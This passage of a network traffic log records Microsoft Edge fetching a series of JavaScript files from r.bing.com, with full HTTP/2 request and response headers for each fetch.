report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/V793ayrBYjBUm-0gdrJPAEYeUiw.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/V793ayrBYjBUm-0gdrJPAEYeUiw.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 07:12:02 GMT
etag: 0x8DCDC68302AE595
content-type: text/javascript; charset=utf-8
content-md5: kpsfiKoLdmYJ5Mpbl3DcJA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 9d07ddd6-801e-0066-53ae-1558ca000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 71736
vary: Accept-Encoding
cache-control: public, no-transform, max-age=305867
expires: Mon, 21 Oct 2024 10:01:32 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac3fe4
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/2DP4HPIfaNQ7pkpsKIkpRa3DF6Y.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/2DP4HPIfaNQ7pkpsKIkpRa3DF6Y.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:29:10 GMT
etag: 0x8DCDC62330B5348
content-length: 5070
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: dbzAhNDtA54biTyiiODCKw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 5109d0a2-e01e-0010-1398-16dc76000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=82714
expires: Fri, 18 Oct 2024 20:02:19 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac3fe1
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/wfFvd-T0rsyA2t0l6hXtEJNsyQE.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/wfFvd-T0rsyA2t0l6hXtEJNsyQE.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 64372
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: w8DrXgREl1d77JG1lw9tMA==
last-modified: Mon, 14 Oct 2024 19:33:01 GMT
etag: 0x8DCEC8704585E3B
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 066305fa-601e-0023-5960-1f855b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=270784
expires: Mon, 21 Oct 2024 00:16:49 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac3fe3
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/lLk8XmbdNzzlnPRzVzDhaF9yjqw.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/lLk8XmbdNzzlnPRzVzDhaF9yjqw.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 430
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: l5PXwpOyUFdqY44wmnrCag==
last-modified: Tue, 24 Sep 2024 06:55:01 GMT
etag: 0x8DCDC65D005C0E0
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3f32ff82-601e-0028-0e2b-169d2f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=380438
expires: Tue, 22 Oct 2024 06:44:23 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac3fe5
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/j7QTvC_hnIspQX0jVufvDFJYNV0.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/j7QTvC_hnIspQX0jVufvDFJYNV0.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:51:45 GMT
etag: 0x8DCDC655B16695E
content-length: 158
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: Tvjjh0NsRYK9Q1w+qIJQug==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f274d45f-501e-006f-716a-154244000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=150045
expires: Sat, 19 Oct 2024 14:44:30 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac3fe6
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/Gyuq2bqitqDJM0BeAkbKXGlQXNw.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/Gyuq2bqitqDJM0BeAkbKXGlQXNw.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:06:53 GMT
etag: 0x8DCDC5F1663B480
content-length: 714
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: wQmZQwuzNQKGWvk013IgpA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6610645e-101e-002c-1bc2-1768ad000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=212695
expires: Sun, 20 Oct 2024 08:08:40 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac3fe7
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/n21aGRCN5EKHB3qObygw029dyNU.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/n21aGRCN5EKHB3qObygw029dyNU.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 806
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: hRrTe9xFPcEQGLGPgVvjhw==
last-modified: Tue, 24 Sep 2024 06:57:19 GMT
etag: 0x8DCDC66220B7293
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d52007ef-d01e-0031-380a-16b147000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=412446
expires: Tue, 22 Oct 2024 15:37:51 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac3fe8
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/8CgcSSLayxEVUBf0swP_bQGMId8.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/8CgcSSLayxEVUBf0swP_bQGMId8.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 156
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 0ApKmxnWdlgJ/r3VvxbmFQ==
last-modified: Tue, 24 Sep 2024 05:52:56 GMT
etag: 0x8DCDC5D2377F40E
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e9f12fea-001e-0055-044d-1701e7000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=45240
expires: Fri, 18 Oct 2024 09:37:45 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac3ffd
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/V_fBQ_iVmAgE_Ta_T-6BNXc0ZY4.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/V_fBQ_iVmAgE_Ta_T-6BNXc0ZY4.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:29:34 GMT
etag: 0x8DCDC6241BA29EA
content-type: text/javascript; charset=utf-8
content-md5: xl2SFLZCQEcsZUNAUSfMmA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ca734619-801e-006d-1b17-1540be000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 393
vary: Accept-Encoding
cache-control: public, no-transform, max-age=306292
expires: Mon, 21 Oct 2024 10:08:37 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac3ffe
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/9xGNA8UskvA9WHF58zbLOHZ5HvI.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/9xGNA8UskvA9WHF58zbLOHZ5HvI.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 05:55:43 GMT
etag: 0x8DCDC5D86C3D99C
content-length: 308
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: rimZQyGjXssDEnuSlgMaJA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: bf18684d-701e-0078-63bc-188227000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=213905
expires: Sun, 20 Oct 2024 08:28:50 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac3fff
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/_2I169N92jVtSc_VEsV0nma5sRY.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/_2I169N92jVtSc_VEsV0nma5sRY.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:36:19 GMT
etag: 0x8DCDC63331FF483
content-length: 312
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: Ij6CMW7d9STrT+a4Nf7dFA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b58b846c-901e-001f-45b8-163180000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=105403
expires: Sat, 19 Oct 2024 02:20:28 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac4000
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/gKwIRAF4fg7noG1zyeUz8x3Jdhc.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/gKwIRAF4fg7noG1zyeUz8x3Jdhc.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:47:07 GMT
etag: 0x8DCDC64B5831289
content-length: 492
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: rSmdN6tN5TS/1yEQ8Z6pNA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 7b418c73-801e-0022-3518-1684a6000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.b7777b5c.1729193841.4509ed65
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=15821
expires: Fri, 18 Oct 2024 01:27:26 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac4001
timing-allow-origin: *
GET

https://r.bing.com/rp/9cuwOQ_qE7qTGKohzrf_gIjTlPI.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/9cuwOQ_qE7qTGKohzrf_gIjTlPI.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 05:55:11 GMT
etag: 0x8DCDC5D73F196CA
content-length: 1532
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: FXbNzL5WiMdS7y/N9ZEDfg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3ead00de-601e-0028-06ff-159d2f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=376404
expires: Tue, 22 Oct 2024 05:37:09 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac4002
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/psgXZvzYJMEW2ydikIk493Va1d4.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/psgXZvzYJMEW2ydikIk493Va1d4.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 07:02:01 GMT
etag: 0x8DCDC66CA2704F8
content-length: 635
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: cbryIH17LuJqgju0sWrerw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 4c8af66e-001e-0033-6cab-16b3bd000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=228633
expires: Sun, 20 Oct 2024 12:34:18 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac4003
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rs/6t/x3/nj/nt6a1ZR520utsLoZmSYgwxdOPgI.js?or=w

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rs/6t/x3/nj/nt6a1ZR520utsLoZmSYgwxdOPgI.js?or=w HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 437
content-type: application/x-javascript; charset=utf-8
server: Kestrel
access-control-allow-headers: *
access-control-allow-origin: *
content-encoding: gzip
last-modified: Mon, 23 Sep 2024 23:58:56 GMT
x-eventid: 671053cd5e51449288fdfb15ab99c73c
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
x-as-instrumentationoptions: AppServerLoggingMaster=1
x-as-machinename: DUBEEAP0000E141
x-as-suppresssetcookie: 1
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-zCZkgqIxRk04p9xWjFgG9KkLiNouTFBGFuomsEO5Ya4='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]}
cross-origin-resource-policy: cross-origin
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.75}
cache-control: public, max-age=356155
expires: Mon, 21 Oct 2024 23:59:40 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac4004
timing-allow-origin: *
GET

https://r.bing.com/rp/5L3iD467J3iJWEPwIjxlK0MMDpY.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/5L3iD467J3iJWEPwIjxlK0MMDpY.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 772
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: yaTET5I1fmUKhVemn0wu5w==
last-modified: Mon, 14 Oct 2024 19:41:54 GMT
etag: 0x8DCEC884215D06E
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6927f078-601e-0067-1379-1e5937000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=171413
expires: Sat, 19 Oct 2024 20:40:38 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac4005
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/awRIKLY04rWw5wNlVL186SolQSo.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/awRIKLY04rWw5wNlVL186SolQSo.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
